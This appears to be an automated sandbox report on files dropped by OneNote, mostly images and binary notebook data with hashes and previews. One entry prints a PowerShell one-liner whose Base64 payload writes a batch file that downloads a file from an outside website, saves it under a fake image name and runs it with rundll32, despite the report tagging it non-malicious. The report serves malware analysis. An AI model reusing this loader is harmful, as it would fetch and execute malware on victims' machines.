SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (380), with no line terminators
Category:	dropped
Size (bytes):	380
Entropy (8bit):	5.853345406863477
Encrypted:	false
SSDEEP:	6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSP8A/lKaHoyCRjpm+Rs3FEY9hMS/aXXrZQ:ssLgyaI4HPKC2EwgvBSU6Ij4+RIFE4qg
MD5:	4B1934D97AE633B5C88F3424B4953761
SHA1:	9EADA74C008237311CBA7367A69A9D291ACE70F2
SHA-256:	74B3A5F20FDB37F8F26025E768EDDDCC08568542402033955C97AF6D8E5D61B4
SHA-512:	04980D507ACC647FA732429DCBB71632FB0F410523E56E39C32F0B89ECA342967DFFC4316B97D0881ABC0C1E7AC2D1A8AAC39B33D00EE0763076A1B65FD2FB99
Malicious:	false
Preview:	powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.530296884432978
Encrypted:	false
SSDEEP:	24:8hs4scFkkchkl6zh4x29gVYeGt/yVYeGtLeGpYeGtmyVYYIYeGt9mYeGtmyVY:bLcikchs6zhuMYMhpMLqMDmML
MD5:	908287DC91736793B889BEC9AB307551
SHA1:	8EDD60953626A81A3CC860A1B61CBF699D252D53
SHA-256:	D0BF6057AAC9AA151D732392A435443FA13BF810194405C859EF770C83045772
SHA-512:	E9B1E0292D5CBCF1DC7E1C5772815D776F25A1D5213BB1971FBBA23722EBCF079112F1AC955D6CAA0F6E2B1CE591DF996FD7E8145F0E081BA2C83418F681270D
Malicious:	false
Preview:	2...>...........x.......................................................................................................................................2...>...........x...,...2...>...X.......x........Y.......Y....K..X.H..wn......wn.oO.<K......).wn.oO.<K......).wn...Y....K..X.H...Y...........................wn....................................................................5.............@.Lo..;.................wn............................................................y.O.G.jS..u".....h...N.................Y..H.Y.^..................................................................................Y..H.Y.^...............y.O.G.jS..u"...........Y.......Y...................................................Y...1...Y.X.4.......................................................0...e.............O...f.... ..!;...................4......(...(...........8.....?...............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8695639387759603
Encrypted:	false
SSDEEP:	6:XaE566eJ2OyeVs2OWMNnn/ll7MHpEDWkeCn1FUYBYWkUlV/sOxNHXpvcE8lQv:X65wIVD5Gl6Hq//1FUYUUletE0
MD5:	48B8524698954D74AC0C20E7094AE418
SHA1:	7707D7A81E51781EA3C8B5F44BD151ADCF1DB941
SHA-256:	7BF44A6FF3D8282E4D20BF0F2094F7D851A5CBB865BCAE1184C8EFFF267C5F52
SHA-512:	A9C994DEF1D0A2DEC8ACB5D6AA0B99CE7662E8D5730D0C48CBA15DAB0FFE3D0E104739523BD9C329B04608B061352686C061CFFDC30FED938C229BCD3133CDFB
Malicious:	false
Preview:	2...>...........x................................................................................................................................................................................................F...@.7e...2s.......\..(I.....3....F...@.7e...2s....\..(I.....3.................................................................................................5.............@.Lo..;.............................................................................../C...$^gA....h...N.................z.u-.E......................................................................................z.u-.E...................../C...$^gA.......................................................................6....`.1............................................................4..~...1...(...(.......Q.u.i.c.k. .N.o.t.e.s.......Q.u.i.c.k. .N.o.t.e.s...........1.......Q.u.i.c.k. .N.o.t.e.s.............................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.546769531558957
Encrypted:	false
SSDEEP:	48:mJcZgDM5axz3Lj6yxyw0LSOBlkw0Lw4CLFJAwEwLWfmAqg0A:mJFD4axjSyxyLBgLM4CJJdEwuPq
MD5:	BEFD02BDEC78C68AC62ACA8D6AD44CCB
SHA1:	E8713B2AC26FF4BEC473AAC6E39BB7DDA1646B2D
SHA-256:	7A01E744C2FA67051218AB57C5C34D0D3FB47A7B5A6533E941504CF5B1D40B4C
SHA-512:	AC7D7DD03163651E2DB897602D1A39FDCCF3C039A16C5268CF9B0BE810D936A3DDBED9E6DC8137AA891A15E04C1DFE38715499D7D4A8D45B60B09A668DD1A74A
Malicious:	false
Preview:	j......@0.......................................................................?.......................................................................j......@h.......................................2.......2..(xSdF.....B..8.......8f.@..).R.u.j..p..xe..2.ZNj....p.....L....,.N.........<....&....!...........................................................................f.......f..NqJ.R.T.h2..P.......P.D.v>I......_.2.......^... ...................2.....8...f..P...p...............2..T%q..L..T.N....fT&....NoT$....P.T.7.......2.......".......l.......P........8..c..,0...e...B4.$..........C@RQ.H..B......Y....................L...n:/D...@M.E.L....Non.*\F...gP. .No.2..(xSdF.....B2.......>..................<....&....!...8f.@..).R.u.j^2..(xSdF.....B}V......}V..n.......p..p.......p..xe..2.ZNj........2........p...c..,0...e...B4.$...........I...M.....0...............................0...........e....4..................T.i.t.l.e.......\|{....B.l...R......(....Y......(...D...L.e.c.t.u.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.634723015448128
Encrypted:	false
SSDEEP:	192:Wsf6Y9gL6yD9o1D0JmnecfmPXFkqRiNg:z/05Ro1Di4uf+qRi
MD5:	9849AFEC83423A775A6AF13E12591F3B
SHA1:	4A396A7A5129C46B49D680BD7BA3D65A428C185A
SHA-256:	015CD7D65A4173A4A2F1034E53C7F58743327015D1F1C2E9B15F51D222BDBA7C
SHA-512:	DAA25E918282E68E5A361934E487DA0E8B660EC6AF2BFB2B0C33286D954485B90A7676903516BA1ADBBC5C292CA071ED638DDDEE420A02C483178F7761EEA117
Malicious:	false
Preview:	2...>.......D...v...8...................................................................................................................................2...>... .......v...l............................I.......I.qk..B.....LZ..U.4.....U".....{..<....U".....{..<....U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................,=...Y......N...^.................I..&K.....#............@f....................................I.qk..B.....LZ....................,=...Y..................,=...Y.............U.......U.......U...........................................Uj......UT%.....U.......U..7....UH......U ......U$......U..~...............;........4...4...4...............U:..UY..UZ..U..z...y.. x.. ...........$........&..$...7...7........o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.7....................H..U..z... ..$......................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.411312172141092
Encrypted:	false
SSDEEP:	192:cEsq9UkjDd8LMOk5oodVOkylqiU2cXEkkRk7RkKbWVJWVTBkJNT9TQc+xmWV8KxP:cZgj54Dk/7hwqzxjkRk7qKeAuJjkrJ/e
MD5:	634623F5C28AD85042FC7D59BAC8773B
SHA1:	CCEF389A4554F2E66979E75B09ADC63141374D14
SHA-256:	D99549A35E5B4FC92A4002948A74C3D75668318C9355FDBE24F8FD9225FC947C
SHA-512:	BBA72256F9099B615CBFEADFB1F3B3BD005D88AD08BBFCFD20A82ED6A54EA3023CB8D07F329E0AB9842A70BEA9DE1E72D734E13A165BFEB4076AA9CA0BF3FA3D
Malicious:	false
Preview:	2...>...v.......v.......@ ..X)..2...>...2.......v.......@...H(...........................................................................................................................................I.......I.qk..B.....LZ..^.H.....^k....2.Y.`9...^k....2.Y.`9...^..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6y.~.!..%...)..d....N...^...............a{f.T.E......K.................................................I.qk..B.....LZ............6y.~.!..%...)..d...................................^.......^.......^...........................................^j......^T%a....^..5....^.......^..z....^.......^.......^..M...............;........4...4...4...............^3..^L..^S..^K..^..z...y.. x.. ........ ..$...$........D..........7...7.........*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.9....................................;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.630223912367521
Encrypted:	false
SSDEEP:	192:zs7vfA6gicchjC6VoX16nBEZk5z+jlR9o+InMXO/Xrd9rL+RpD1yCU59eT8XP68k:oc01jE16n0DjrVOvrmRpD1bUDgNSqN
MD5:	0BD77286543F44CCE4759F484A47715D
SHA1:	8E5E60DF040728E70587E9AB2B180CB47A21A6F1
SHA-256:	18AEB754D55591DDB640B7E59AFB513BF62289A00EC9F5E1E915296A7A744277
SHA-512:	4DF3C2602F7C2BAB69C5C9A8838933582B66E2824DC4F868A4DA9805E33D5D7114521A56E4AA430F560042BE9D432A5DBBC4BA2481F9A11A9EFEAA240FFA030B
Malicious:	false
Preview:	2...>...&...j...v...>.... ...,..2...>...........v.......@....+...........................................................................................................................................I.......I.qk..B.....LZ....N.......i..,6.G..&.....i..,6.G..&......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................9m.J..#;.........N...^................."....I..Q.i..<............t....................................I.qk..B.....LZ...............9m.J..#;.....................................................................................................j.......T(................@.......c.......p.....$.\.$...$.................;........4...4...4................3.......z...y.. x.. ...........$...........7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.6..............z.......R......................7............S.y.m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.9048833588552117
Encrypted:	false
SSDEEP:	192:SsydU9/iIOaHw9YxNP2UFquk0eHMuZ8E88VYY07TYfX+Reac904NJ64N2a:fZ/jxHwOzPPAMuZh8GYXvq+Re3
MD5:	4A0E3B83D74F10AB45A7FD390CBB5636
SHA1:	56188F4E38D47EC6B75979EAB3983535673407D9
SHA-256:	E92780D49EE088605C7E266B4FCE554AF28E95BCDD7F955AA442C8169ACFE937
SHA-512:	26B68347EDD6B5CE545E88EB720511C7C4FD66B788D3E37F647FAF44D6AF7D687132CFB6681DC7E678C9ADB328563C73FA20FD11C2E05F26B84BBF8212B0FE2F
Malicious:	false
Preview:	....>......."...v....... ..."......>.......r...v...>...@....!...........................................................................................................................................I.......I.qk..B.....LZ.......................X...,...9.l8..\IX.................^.....I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'...............)...J....b.Bl)....N...^...............V[....G.{.?..hZ............r...............................z....I.qk..B.....LZ..............)...J....b.Bl)............................................................................................X...8...X...,...9.l8..\I......................^2................................I...............................X..H....X.......X....Y..X.......X.. ....X..$.7..X.......X.. ........X..!X....z...,4. ............................"......$...7...............T.u.e.s.d.a.y.,. .J.u.l.y. .2.8.,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.8649095102556648
Encrypted:	false
SSDEEP:	192:KLKsaVrMoVUCdDdePD/9JejUyE/X0GPWEVHA1sCWa+WFsao2XdTRlYECu:iaVrdUCjSD1JeWkW4HWa+WFtXdTRlY
MD5:	8A39ADC54F4F8DEEE7C2758DC4AA2229
SHA1:	8B48757E66A427A8444FF0B5AEE589B944CCA036
SHA-256:	279B58B597EB04057CABAD9B4A3DD3D98DE268ED4E1990837370A548384D7EF5
SHA-512:	C8C626758D921BA16385EF8E7665CCA9A7ECEDE5666F8A1ECFD87A1A37A3A80CFBE73E8B171B954FAE53101FA66A7E5ACDE9137DC6473F3724F9F7F3F61D8C11
Malicious:	false
Preview:	2...>...........v.......H ...!..2...>...R...,...v.......@.... ...........................................................................................................................................I.......I.qk..B.....LZ....<......-......./Q.....-......./Q.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............._..t...<<..........N...^.................jbp..E..F.}..............P...............................4....I.qk..B.....LZ............._..t...<<......................................................................................................j.......T.q..............].....H....... .@.....$........d...............;........4...4...4..............z.......R......................7............S.y.m.b.o.l.......................'...%.....z...,4. .......$>........4..p..7........................................;........4...4...4

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	5.327274216210832
Encrypted:	false
SSDEEP:	384:cV15MA3llrhQnukdYdz4ajWTKtuJyNHDfHvWSYZE03Xgsnyw/CxZ/YCOiDrFIt:cVvlslK6/q5cXF0Ut
MD5:	2994ACFF2D419658E758784F88A6A7F6
SHA1:	E814E434A4D1D417D5FCF22DFD4083FC8787000B
SHA-256:	E4C3866F38150FFD249D29851972FFE83E0E8844E0C5ADB2501C49BD6FB2DEFB
SHA-512:	049F699FF67CCA4EAF63057B00C0956226DC6AB5B58AB56354004AB6ECA77A85898982674FD9D1BB985E60120D7480C0297B1535B937425A8D72F2E9FC11EDAD
Malicious:	false
Preview:	...@....0...........H...0@..0 ..@L.........@................d....J..0 ...K.................................................................................@.....................J..0 ..`K..............9.......9...&.A..).1..#.1)......1).i.[.5.P...i.hD.GE6.?..gU'..hD........6.....n.....r.w.7..!LKN'....r..........hD......hD..................................................9..T!...W&.T%......T.....-.T.k..../T.'..a.BT......GT.....nLT.............0...........e....4.........................Ap.H..@.AFJy.k.....(.....x.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .O.r.a.n.g.e...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...2...0.0.0.2.4...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e............=i9.J....\............I...N.3f.....2.......R.......t...............9.......0A..W&.......1).../...............0...........e....4.........................A..:4E.2..p1......(...`.i.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .Y.e.l.l.o.w...j...P.a.g.e.L.o.c.I.

